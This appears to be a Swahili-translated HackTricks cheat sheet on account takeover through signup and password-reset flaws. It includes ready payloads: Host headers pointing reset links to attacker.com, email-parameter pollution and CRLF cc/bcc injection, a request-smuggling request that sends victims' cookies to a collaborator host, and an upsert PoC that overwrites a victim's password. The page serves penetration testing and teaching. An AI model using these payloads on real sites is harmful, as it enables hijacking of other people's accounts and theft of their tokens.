HackTricksUdhaifu wa Usajili na Kunyang'anywa kwa Akaunti
Reading time: 8 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Kunyang'anywa kwa Usajili
Usajili Rudufu
- Jaribu kutengeneza kwa kutumia username iliyopo
- Angalia kubadilisha barua pepe:
- herufi kubwa
- +1@
- ongeza nukta katika barua pepe
- herufi maalum katika sehemu ya jina la barua pepe (%00, %09, %20)
- Weka whitespace baada ya barua pepe:
test@test.com a - victim@gmail.com@attacker.com
- victim@attacker.com@gmail.com
Utambuzi wa Majina ya Mtumiaji
Angalia kama unaweza kubaini wakati jina la mtumiaji tayari limejisajili ndani ya programu.
Sera ya Nywila
Unapotengeneza mtumiaji angalia sera ya nywila (angalia kama unaweza kutumia nywila dhaifu).
Katika hali hiyo unaweza kujaribu bruteforce credentials.
SQL Injection
Angalia ukurasa huu kujifunza jinsi ya kujaribu kunyang'anya akaunti au kutoa taarifa kupitia SQL Injections katika fomu za usajili.
Oauth Takeovers
SAML Vulnerabilities
Badilisha Barua Pepe
Ukishasajiliwa jaribu kubadilisha barua pepe na angalia kama mabadiliko haya yameidhinishwa ipasavyo au kama yanaweza kubadilishwa hadi anwani yoyote ile.
Mambo ya Ziada ya Kuchunguza
- Angalia kama unaweza kutumia disposable emails
- Long password (>200) hupelekea DoS
- Angalia rate limits kwenye uundaji wa akaunti
- Tumia username@burp_collab.net na uchambue the callback
Kunyang'anywa kwa Reset ya Nywila
Password Reset Token Leak Via Referrer
- Omba password reset kwa anwani yako ya barua pepe
- Bonyeza link ya password reset
- Usibadilishe nywila
- Bonyeza tovuti yoyote ya 3rd party (mf: Facebook, twitter)
- Intercept ombi katika Burp Suite proxy
- Angalia ikiwa referer header is leaking password reset token.
Password Reset Poisoning
- Intercept ombi la password reset katika Burp Suite
- Ongeza au hariri headers zifuatazo katika Burp Suite :
Host: attacker.com,X-Forwarded-Host: attacker.com - Forward ombi na header iliyohaririwa
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com - Tafuta URL ya password reset kulingana na host header kama :
https://attacker.com/reset-password.php?token=TOKEN
Password Reset Via Email Parameter
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
IDOR on API Parameters
- Mshambuliaji lazima aingie kwa akaunti yao na aende kwenye kipengele cha Change password.
- Anzisha Burp Suite na intercept ombi
- Tuma kwenye tab ya Repeater na badilisha vigezo: User ID/email
powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})
Weak Password Reset Token
Token ya reset ya password inapaswa kuundwa kwa nasibu na kuwa ya kipekee kila mara.
Jaribu kubaini kama token inaisha (expire) au ikiwa daima ni ile ile; katika baadhi ya kesi algorithm ya uundaji ni dhaifu na inaweza kukisiwa. Vigezo vifuatavyo vinaweza kutumika na algorithm:
- Timestamp
- UserID
- Barua pepe ya mtumiaji
- Jina na jina la mwisho
- Tarehe ya kuzaliwa
- Cryptography
- Nambari pekee
- Small token sequence ( characters between [A-Z,a-z,0-9])
- Token reuse
- Tarehe ya kumalizika kwa token
Leaking Password Reset Token
- Chochea ombi la reset la password kwa kutumia API/UI kwa barua pepe maalum, kwa mfano: test@mail.com
- Chunguza majibu ya server na angalia
resetToken - Kisha tumia token kwenye URL kama
https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]
Password Reset Via Username Collision
- Jisajili kwenye mfumo kwa username sawa na ya mwathiriwa, lakini ukiweke nafasi tupu kabla na/au baada ya username. e.g:
"admin " - Omba reset ya password kwa kutumia username yako ya uharibifu.
- Tumia token iliyotumwa kwa barua pepe yako na fanya reset ya password ya mwathiriwa.
- Ingia kwenye akaunti ya mwathiriwa kwa kutumia password mpya.
Jukwaa CTFd lilikuwa dhaifu dhidi ya shambulio hili.
See: CVE-2020-7245
Account Takeover Via Cross Site Scripting
- Tafuta XSS ndani ya application au subdomain ikiwa cookies zimepangwa kwa parent domain :
*.domain.com - Leak sessions cookie ya sasa
- Thibitisha kama mtumiaji kwa kutumia cookie
Account Takeover Via HTTP Request Smuggling
1. Tumia smuggler kutambua aina ya HTTP Request Smuggling (CL, TE, CL.TE)
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
2. Tengeneza request itakayofuta POST / HTTP/1.1 na data ifuatayo:
GET http://something.burpcollaborator.net HTTP/1.1 X: kwa lengo la ku-open redirect wa waathiriwa kwenda burpcollab na kuiba cookies zao
3. Ombi la mwisho linaweza kuonekana kama lifuatayo
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0
GET http://something.burpcollaborator.net HTTP/1.1
X: X
Hackerone ripoti kuhusu kutumiwa kwa bug hii
* https://hackerone.com/reports/737140
* https://hackerone.com/reports/771666
Account Takeover via CSRF
- Tengeneza payload kwa CSRF, mfano: “HTML form with auto submit for a password change”
- Tuma payload
Account Takeover via JWT
JSON Web Token inaweza kutumika kuthibitisha mtumiaji.
- Hariri JWT kwa User ID / Email mwingine
- Angalia saini dhaifu ya JWT
JWT Vulnerabilities (Json Web Tokens)
Registration-as-Reset (Upsert on Existing Email)
Baadhi ya signup handlers hufanya upsert wakati email iliyotolewa tayari ipo. Ikiwa endpoint inakubali minimal body yenye email na password na haitekelezi uthibitisho wa umiliki, kutuma email ya mwathiri kutabadilisha password yao kabla ya uthibitisho.
- Discovery: vunja majina ya endpoints kutoka bundled JS (au trafiki ya mobile app), kisha fuzza base paths kama /parents/application/v4/admin/FUZZ ukitumia ffuf/dirsearch.
- Method hints: GET inayorejesha ujumbe kama "Only POST request is allowed." mara nyingi inaonyesha kitenzi sahihi na kwamba JSON body inatarajiwa.
- Minimal body observed in the wild:
{"email":"victim@example.com","password":"New@12345"}
Mfano wa PoC:
POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json
{"email":"victim@example.com","password":"New@12345"}
Athari: Full Account Takeover (ATO) bila reset token, OTP, au email verification.
Marejeo
- How I Found a Critical Password Reset Bug (Registration upsert ATO)
- https://salmonsec.com/cheatsheet/account_takeover
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.